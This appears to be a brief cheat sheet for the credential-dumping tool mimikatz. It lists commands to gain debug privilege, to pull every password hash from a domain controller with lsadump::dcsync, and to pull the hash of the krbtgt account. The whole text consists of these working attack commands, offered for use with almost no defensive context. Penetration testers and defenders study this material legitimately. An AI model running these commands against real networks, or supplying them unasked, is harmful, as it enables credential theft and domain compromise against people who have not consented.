mimikatz.exe
A little tool to play with Windows security.
Get ready to work with mimikatz
Before running mimikatz, you'll want to launch a command prompt with admin rights, then:
mimikatz.exe
privilege::debug
Extract all hashes from a domain controller (when you have DA rights)
lsadump::dcsync /domain:domain.com /all /csv
Extract hashes of a single user
lsadump::dcsync /domain:domain.com /user:krbtgt